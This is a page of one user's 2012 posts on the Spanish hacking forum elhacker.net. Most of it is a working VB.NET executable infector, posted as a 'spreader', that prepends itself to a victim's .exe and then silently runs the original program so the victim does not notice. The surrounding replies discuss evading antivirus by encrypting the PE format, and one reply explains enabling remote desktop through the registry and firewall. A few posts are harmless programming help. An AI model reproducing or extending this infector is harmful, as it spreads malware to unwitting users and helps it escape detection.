elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 [129] 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 ... 166
1281  Programación / .NET (C#, VB.NET, ASP) / Re: [Spreader] Infectar ejecutables VB.NET en: 30 Abril 2012, 20:31 pm
Y donde iria nuestro codigo? en Ejecutar_Hostage? podrias comentar eso, poniendo ' aca el codigo nuestro xD Y fijate que te equivocaste en el comentario de Si existe la firma o si no existe, eso me hizo confundir tambien xD

if ... "Si la firma esta en la copia.."

else
"Como hemos encontrado la firma"

El primero es ' Si la firma NO esta en la copia, creo por lo menos, si tengo razon ya entendi y ya he hecho cosas de estas, solo que .net lo hace todo mas facil, queda lindo xD Saludos

Gracias por fijarte, tienes razon en lo de la sentencia condicional:D El método Ejecutar_Hostage lo que hace es sacar el código de la aplicación original de la aplicación infectada. No sé si me explico a horrores, pero si es así recuerdamelo jajajaj.

Como no utilizo antivirus, me pregunto, lo detecta algún antivirus?

P.D : Estoy averiguando como cifrar el formato PE de los .exe de .net, para seguridad e impedir q sean detectables, si alguien tiene algun link o info q compartir, gracias.
Saludos.  ;D

El mío desde luego no, espero que dure tiempo sin ser "cazado". Por cierto, ¿podrias comentar algo sobre lo que estas buscando de cifrar el formato PE?

Saludos!
1282  Programación / .NET (C#, VB.NET, ASP) / Re: [Spreader] Infectar ejecutables VB.NET en: 30 Abril 2012, 16:55 pm
No vas mal encaminado :D Se autocopia la aplicación bajo Copia.exe para asi extraer los datos de nuestra aplicación. Luego abro archivo.exe que es el ejecutable a infectar, saco sus datos y los guardo en el array donde están los datos de nuestra aplicación. Entonces ya tenemos un array con los datos de ambas aplicaciones.. Le meto una Firma y creo el nuevo archivo bajo el nombre archivo.exe (el mismo que el del ejecutable anterior, para que la victima no sospeche).

Luego si el ejecutable tiene la Firma, entonces extraigo el ejecutable original temporalmente, así el usuario ejecuta nuestro código y el archivo original, para no levantar sospechas.

Saludos.
1283  Programación / .NET (C#, VB.NET, ASP) / Re: Contar registros en: 30 Abril 2012, 06:18 am
¿No le encuentras lógica a que nuestro programa guarde los datos ingresados en ciertos campos de texto? xD Diría que es de lo más util para no tener que guardarlo de forma indirecta (sobre .txt etc) No sólo eso, puedes guardar muchas propiedades del control, volver a dejarlo como estaba.

Aquí te dejo una captura de donde configurar las propiedades a guardar:



Saludos.
1284  Seguridad Informática / Seguridad / Re: [Duda] Ver escritorio desde netcat en: 30 Abril 2012, 06:13 am
En la siguiente clave del registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\fDenyTSConnections cambia el valor a 0. Puede que el Firewall rechaze la conexión remota, te lo puedes cargar o añadir una excepción mediante Netsh en el puerto 3389.

Saludos.
1285  Foros Generales / Foro Libre / Re: Hombre pues que tengo un problema? nunca acabo un libro!!!!! en: 30 Abril 2012, 06:02 am
Claro que me ha pasado. Sobre todo cuando decidí por aprender por mi mismo. Lo que me pasaba es que no terminaba nada de lo que empezaba, me atraían mogollon de cosas y como para estar en todas a la vez. Ayuda mucho el hecho de que vayas de rama en rama pues cuando quieras aprender algo que creas que es nuevo igual no lo es tanto. Eso sí, si realmente quieres conseguir algo y está en tu cabeza en mi caso podría leer hasta escrituras prehistoricas. Ahora eso ya cambió, ya he encotrado mi rama. Cosa de gustos, hasta que te acomodes.

Saludos.
1286  Programación / .NET (C#, VB.NET, ASP) / Re: Contar registros en: 30 Abril 2012, 05:42 am
Si quieres mostrar un dato en un Control como puedes ser un TextBox o un ComboBox debes saber que hay propiedades que guardan los atributos de los controles al cerrar la aplicación.

Puedes guardar la propiedad .Text de un TextBox pinchando sobre éste en el apartado de diseño y en ApplicationSettings > DataBindings seleccionas la propiedad a guardar. Aplicable a otro tipo de controles, era por poner un ejemplo.

Saludos.
1287  Programación / .NET (C#, VB.NET, ASP) / [Spreader] Infectar ejecutables VB.NET en: 30 Abril 2012, 05:37 am
Qué tal andamos?

Bueno, hace días que llevo programando una cosilla (bla bla) y necesitaba que mi código se ejecutara en otros procesos, para ello agrego mi código al principio de un nuevo ejecutable y después el del archivo a infectar. Hasta ahí bien, pero ¿qué sucede si la víctima abre el archivo infectado? ¿Estará corrupto? Nada de eso, se ejecutará mi código. El original seguirá en el ejecutable infectado pero no correrá.

Como al inicio de la aplicación comprobamos si existe la firma en el archivo infectado miramos si es así entonces abrimos el archivo infectado y llenamos un Buffer con los datos de éste. Después, como sabemos la longitud de los datos de nuestro programa, en función de ésta seremos capaces de extraer los bytes de la aplicación original.

Funciona a la perfección. Me gustaría que me dierais vuestra opinión, no estaría de más mejorar el código.

Código
  1. Private Sub Infectar_EXE(ByVal Rutas As Object())
  2.        Try
  3.            Dim Ruta_Archivo As String = CType(Rutas(0), String) 'declaramos las rutas..
  4.            Dim RutaHost As String = CType(Rutas(1), String)
  5.            Dim fs As New FileStream(Ruta_Archivo, FileMode.Open, FileAccess.Read) 'abrimos nuestra copia
  6.            Dim size As Long = fs.Length 'obtenemos los datos de nuestra copia
  7.            Dim Buffer(size) As Byte 'declaramos un Buffer que tendrá como tamaño los datos de nuestra copia
  8.            Dim firma As Byte() = Encoding.Default.GetBytes("Firma") 'Preparamos la firma para escribirla/buscarla en el Buffer
  9.            fs.Read(Buffer, 0, Buffer.Length) 'escribimos en el Buffer actual los datos de la copia
  10.            fs.Close()
  11.            Kill(Ruta_Archivo) 'eliminamos la copia
  12.            fs = New FileStream(RutaHost, FileMode.Open, FileAccess.Read) 'apuntamos al archivo que se generará..
  13.            size += (fs.Length) 'obtenemos el nuevo tamaño para el Buffer (longitud de los datos de nuestro progama + long. datos del programa Host)
  14.            Dim offset As Long = size - fs.Length 'obtenemos los datos de la copia (Repetido pero necesario)
  15.            If IndexOf(Buffer, firma) = -1 Then 'Si la Firma NO ESTÁ en la copia...
  16.                Array.Resize(Buffer, size) 'Modificamos el tamaño del Buffer en función de la variable Size
  17.                fs.Read(Buffer, offset, fs.Length) 'Llenamos el Buffer
  18.                fs.Close()
  19.                Kill(RutaHost) 'Eliminamos el archivo
  20.                fs = New FileStream(RutaHost, FileMode.Create, FileAccess.Write)
  21.                fs.Write(Buffer, 0, Buffer.Length) 'Guardamos un nuevo archivo que será el nuestro Infectado
  22.                fs.Write(firma, 0, firma.Length) 'Le añadimos la Firma al final
  23.                fs.Close()
  24.            Else
  25.                'Como hemos encontrado la Firma entonces..
  26.                fs.Close()
  27.                Ejecutar_Hostage(RutaHost, Buffer, 17920, Buffer.Length - 17920) 'Generamos el archivo Original y lo ejecutamos
  28.            End If
  29.        Catch ex As Exception
  30.            MsgBox(ex.Message)
  31.        End Try
  32.    End Sub
  33.    Private Sub Ejecutar_Hostage(ByVal RutaHost As String, ByVal Buffer As Byte(), ByVal offset As Long, ByVal Count As Int32)
  34.        Dim copia_temporal As New FileStream("C:\temporal.exe", FileMode.Create, FileAccess.Write)
  35.        copia_temporal.Write(Buffer, offset, Count)
  36.        copia_temporal.Close()
  37.        If Not Process.GetCurrentProcess.MainModule.FileName.Contains("Infectar Ejecutables") Then 'Si el nombre del Archivo que se ha ejecutado
  38.            'es distinto del que usamos para la infección
  39.            Process.Start("C:\temporal.exe")
  40.        End If
  41.    End Sub
  42.    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
  43.        FileSystem.FileCopy(Process.GetCurrentProcess.MainModule.FileName, "C:\copia.exe") 'nos copiamos en C:\
  44.        Dim Obj() As Object = {"C:\copia.exe", "C:\archivo.exe"} 'inicio un array que contendra las rutas de los archivos
  45.        Dim ThreadInfectar As New Thread(AddressOf Infectar_EXE)
  46.        ThreadInfectar.Start(Obj) 'iniciamos un nuevo hilo pasandole las rutas
  47.    End Sub
  48.    Private Function IndexOf(BuscarEnArray As Byte(), EncotrarBytes As Byte()) As Integer
  49.        'buscamos en el Buffer la Firma
  50.        Dim encoding__1 As Encoding = Encoding.GetEncoding(1252)
  51.        Dim buscar As String = encoding__1.GetString(BuscarEnArray, 0, BuscarEnArray.Length)
  52.        Dim encontrar As String = encoding__1.GetString(EncotrarBytes, 0, EncotrarBytes.Length)
  53.        Dim result As Integer = buscar.IndexOf(encontrar, StringComparison.Ordinal)
  54.        Return result
  55.    End Function
  56.  

Poco tiene esto de Spreader, pero eso ya me lo guardo para mí jejeje.

Saludos.
1288  Programación / Java / Re: Editor Hexadecimal...???? en: 29 Abril 2012, 23:45 pm
No programo en Java pero creo entender lo que pides. Necesitas codear una función que lea los datos de un archivo y los pase a hexadecimal, todo ello en un visor.
Tenía curiosidad y lo acabo de hacer en .NET. Básicamente lo que tienes que hacer es:

crear un flujo y apuntar a tu archivo/aplicación. Leer los bytes del archivo y meterlos en un Buffer, para posteriormente pasar a hexadecimal todos los bytes del Buffer. Con eso estaría todo bien.

Saludos.
1289  Comunicaciones / Redes / Re: duda conexion a red mediante un ordenador con ip "clonada" en: 28 Abril 2012, 22:13 pm
Tendrán un programa monitorizando las acciones de los equipos de tu trabajo. Si te llevas el portatil tal vez monitoricen las páginas que visitas, dudo de que puedan "escanear" tus archivos.

Si cambias tu IP por la de una máquina conectada a la misma red pues habrá dos en uso, seguramente a uno de los dos le dará problemas de conexión como acceso nulo.

Saludos.
1290  Seguridad Informática / Análisis y Diseño de Malware / Re: Como crear un troyano vbasic en: 28 Abril 2012, 20:51 pm
No dejes de mirarlo, aunque cliente-servidor esten programados en distintos lenguajes.

Saludos.
Páginas: 1 ... 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 [129] 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 ... 166
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines